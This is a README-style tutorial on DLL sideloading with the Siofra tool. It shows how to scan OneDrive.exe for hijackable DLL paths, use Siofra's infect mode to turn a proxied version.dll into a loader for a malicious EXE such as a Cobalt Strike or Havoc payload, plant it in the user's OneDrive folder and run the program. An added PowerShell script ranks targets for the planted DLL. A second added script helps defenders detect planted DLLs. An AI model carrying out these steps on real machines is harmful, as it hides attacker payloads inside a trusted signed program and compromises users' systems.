DLL sideloading using an EXE or a DLL payload

What we need:

- A malicious EXE (for example one generated by Havoc or Cobalt Strike, or a dropper) or a malicious DLL.
- A legitimate DLL to proxy (the one the target program really loads).
- A hijackable location for that DLL: a directory the target program searches before the DLL's real path, and which we can write to. Siofra, the same tool used below, finds these locations for us.
USAGE:

- Clone the repo or download the zip.
- First we have to find a hijackable location and a target binary. A program installed under the user's profile is ideal, because its directory can be written to without admin rights.
- For OneDrive the location of OneDrive.exe is C:\Users\mulware\AppData\Local\Microsoft\OneDrive\OneDrive.exe (a per-user install under AppData\Local, so the user owns the directory).
- Open cmd and go to the Siofra location.
- Use the command: Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f C:\Users\mulware\AppData\Local\Microsoft\OneDrive\OneDrive.exe
- You will get the vulnerable locations, one line per module. Each line gives the path where a planted DLL would be picked up and the real path of the DLL the program expects (the file we will proxy). Example:

  [!] Module Secur32.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\Secur32.dll (real path: C:\WINDOWS\system32\Secur32.dll)
  [!] Module VERSION.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\VERSION.dll (real path: C:\WINDOWS\system32\VERSION.dll)
  [!] Module WININET.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\WININET.dll (real path: C:\WINDOWS\system32\WININET.dll)
  [!] Module WTSAPI32.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\WTSAPI32.dll (real path: C:\WINDOWS\system32\WTSAPI32.dll)
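Before building a proxy DLL it is worth triaging the scan lines above, because a reported location is only useful if the current user can write there, the module is not a KnownDLL (those are always mapped from System32, whatever sits in the application directory), and the real DLL has the same bitness as the target process. The PowerShell below is an added example, not code from this repo or from Siofra: it parses the "[!] Module ... vulnerable at ... (real path: ...)" lines and runs those three checks. The function names (Test-SiofraHijack, Get-PEMachine, Test-DirectoryWritable) are my own, the embedded sample is the four lines quoted above, and the checks only mean something when run on the target machine as the user who will plant the DLL.

```powershell
# Added example (not part of Siofra or this README): triage Siofra --dll-hijack findings.
# For every "[!] Module ... vulnerable at ... (real path: ...)" line it reports whether
#   - the hijack directory is writable by the current user (no write, no plant),
#   - the module is a KnownDLL (always mapped from System32, cannot be sideloaded),
#   - the real DLL has the same bitness as the target EXE (a 32-bit DLL never loads into a 64-bit process).

function Get-PEMachine {
    # Returns 'x86', 'x64' or the raw IMAGE_FILE_HEADER.Machine value of a PE file.
    param([Parameter(Mandatory)][string]$Path)
    $bytes    = [System.IO.File]::ReadAllBytes($Path)
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)           # e_lfanew in the DOS header
    $machine  = [BitConverter]::ToUInt16($bytes, $peOffset + 4)  # Machine field, right after "PE\0\0"
    switch ($machine) {
        0x014c  { 'x86' }
        0x8664  { 'x64' }
        default { '0x{0:x4}' -f $machine }
    }
}

function Test-DirectoryWritable {
    # Creates and deletes a randomly named probe file; more reliable than interpreting the ACL by hand.
    param([Parameter(Mandatory)][string]$Path)
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        $true
    } catch {
        $false
    }
}

function Test-SiofraHijack {
    param(
        [Parameter(Mandatory)][string]$TargetExe,
        [Parameter(ValueFromPipeline)][string]$Line
    )
    begin {
        $targetArch = Get-PEMachine $TargetExe
        # KnownDLLs are listed in the registry; each value is a DLL file name.
        $knownKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
        $knownDlls = (Get-ItemProperty -LiteralPath $knownKey).PSObject.Properties |
            Where-Object { $_.Value -is [string] -and $_.Value -like '*.dll' } |
            ForEach-Object { $_.Value.ToLowerInvariant() }
        $pattern = '^\[!\] Module (?<module>\S+) vulnerable at (?<hijack>.+?) \(real path: (?<real>.+?)\)\s*$'
    }
    process {
        if ($Line -match $pattern) {
            $hijackDir = Split-Path -Parent $Matches.hijack
            $realArch  = if (Test-Path -LiteralPath $Matches.real) { Get-PEMachine $Matches.real } else { 'missing' }
            [pscustomobject]@{
                Module      = $Matches.module
                HijackPath  = $Matches.hijack
                RealPath    = $Matches.real
                DirWritable = Test-DirectoryWritable $hijackDir
                KnownDll    = $knownDlls -contains $Matches.module.ToLowerInvariant()
                TargetArch  = $targetArch
                ArchMatch   = ($realArch -eq $targetArch)
            }
        }
    }
}

# Constructed sample: the scan output quoted in the README. In practice pipe Siofra in directly:
#   Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f <exe> | Test-SiofraHijack -TargetExe <exe>
$target = 'C:\Users\mulware\AppData\Local\Microsoft\OneDrive\OneDrive.exe'
$sample = @'
[!] Module Secur32.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\Secur32.dll (real path: C:\WINDOWS\system32\Secur32.dll)
[!] Module VERSION.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\VERSION.dll (real path: C:\WINDOWS\system32\VERSION.dll)
[!] Module WININET.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\WININET.dll (real path: C:\WINDOWS\system32\WININET.dll)
[!] Module WTSAPI32.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\WTSAPI32.dll (real path: C:\WINDOWS\system32\WTSAPI32.dll)
'@ -split "`r?`n"

$sample | Test-SiofraHijack -TargetExe $target | Format-Table -AutoSize
```

Pick a row where DirWritable is True, KnownDll is False and ArchMatch is True; that is the module to proxy in the next steps. A row with ArchMatch False tells you the copy of the DLL you feed to infect mode has to come from the other system directory.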
- Make a folder (for example named dll-sideloading).
- Copy the DLL you want to proxy from the real path shown in the scan into the folder (for example copy C:\WINDOWS\system32\VERSION.dll into it). Take it from the real path Siofra reports so its bitness matches the target: a 32-bit process will not load a 64-bit DLL, and vice versa.
- Also place the malicious DLL or EXE in the folder.
- Make a sub-folder named output.
- Open cmd and go to the Siofra location.
- Use the command: Siofra64.exe --mode infect -f C:\Users\mulware\Desktop\DLL-sideloading\version.dll -o C:\Users\mulware\Desktop\DLL-sideloading\output\version.dll --payload-path C:\Users\mulware\Desktop\DLL-sideloading\malware.exe --payload-type process
- The payload type is process for an EXE (launched when the infected DLL runs) and library for a DLL (loaded into the infected DLL at runtime).
- If successful you will get the infected DLL in the output folder. It is the real version.dll with the payload loader added, so OneDrive.exe still finds the exports it imports.
- Copy the infected DLL to the vulnerable location found above (for example C:\Users\mulware\AppData\Local\Microsoft\OneDrive\VERSION.dll). The file name must match the module name from the scan exactly.
- Now run OneDrive.exe.
- BOOM!
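The planted file is also what a defender looks for after this last step: a DLL sitting in an application directory under the name of a system DLL, whose bytes differ from the system copy and whose Authenticode signature no longer validates (a DLL modified by infect mode no longer matches its original Microsoft signature, so Get-AuthenticodeSignature reports HashMismatch, or NotSigned if the signature was stripped, rather than Valid). The PowerShell below is an added example, not code from this repo or from Siofra, that hunts for such files under a directory; the function name Find-ShadowedSystemDll is my own, and the OneDrive path in the usage line is the README's example for the current user.

```powershell
# Added example (not part of Siofra or this README): the defender's check for a planted proxy DLL.
# Walks a directory tree, keeps only DLLs whose name also exists in System32 or SysWOW64,
# and reports their Authenticode status and whether the bytes match the system copy.

function Find-ShadowedSystemDll {
    param([Parameter(Mandatory)][string]$Root)
    $sysDirs = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64")
    Get-ChildItem -LiteralPath $Root -Recurse -File -Filter '*.dll' -ErrorAction SilentlyContinue |
      ForEach-Object {
        $dll = $_
        # A system DLL of the same name must exist, otherwise this is not a sideloading candidate.
        $sysCopy = $sysDirs | ForEach-Object { Join-Path $_ $dll.Name } |
                   Where-Object { Test-Path -LiteralPath $_ } | Select-Object -First 1
        if (-not $sysCopy) { return }
        $sig      = Get-AuthenticodeSignature -LiteralPath $dll.FullName
        $appHash  = (Get-FileHash -LiteralPath $dll.FullName -Algorithm SHA256).Hash
        $sysHash  = (Get-FileHash -LiteralPath $sysCopy -Algorithm SHA256).Hash
        $sameHash = ($appHash -eq $sysHash)
        [pscustomobject]@{
            Path         = $dll.FullName
            SystemCopy   = $sysCopy
            Signature    = $sig.Status
            Signer       = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
            SameAsSystem = $sameHash
            # Differs from the system file and is not validly signed: worth a closer look.
            # (A vendor legitimately shipping its own signed copy stays Valid and is not flagged.)
            Suspicious   = (-not $sameHash) -and ($sig.Status -ne 'Valid')
        }
      }
}

# Check the directory used in the README's OneDrive example for the current user.
Find-ShadowedSystemDll -Root "$env:LOCALAPPDATA\Microsoft\OneDrive" |
    Where-Object Suspicious | Format-Table -AutoSize
```

Drop the Where-Object to see every shadowing DLL, including benign vendor copies, which is useful for building a baseline of what normally lives next to a given executable.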
:::::::::OPTIONAL :::::::::
More usage (Siofra's own help text):

[*] Siofra version 1.13 usage: Siofra64.exe --mode [Supported modes: "file-scan", "mem-scan" and "infect"] -v [Optional. Output verbosity level]

- Verbosity levels:
  - 0 - No output
  - 1 - Only critical success/failure status (default)
  - 2 - Additional status details for success/failure status, including discarded PEs
  - 3 - Everything
- File scan mode:
  - -f [File or directory to scan]
  - -r [Optional. Recursive scan]
  - --signed [Optional. Process only signed binaries]
  - --delayload [Optional. Include delayload imports in dependency list]
  - --explicit-loadlibrary [Optional. Include potentially explicit imports in dependency list (these are *.dll strings which may have been called via LoadLibrary(Ex)A/W)]
  - --auto-elevate [Optional. Scan only auto-elevate binaries]
- Memory scan mode:
  - --pid [Target process ID to scan. When not specified, a list of either 32 or 64-bit process names/PIDs will be enumerated (corresponding to either the 32 or 64-bit version of this tool)]
- Any scan mode:
  - --enum-dependency [Enumerate dependencies]
  - --show-unmapped-apiset [Optional. Include API sets which failed to map to a module from output (ignored by default)]
  - --dll-hijack [Enumerate DLL hijacking vulns]
  - --find-module [Optional. Scan dependencies for a specific module. Note that this excludes KnownDLLs]
- Infect mode:
  - -f [DLL file to infect]
  - -o [Output file]
  - --payload-path [Path of DLL to be loaded in to infected DLL at runtime, or path of executable to be launched at runtime]
  - --payload-type [The type of payload specified in the parasite payload path. This can be "process" (generally indicating an exe) or "library" (generally indicating a DLL)]
CREDITS : https://github.com/cys3c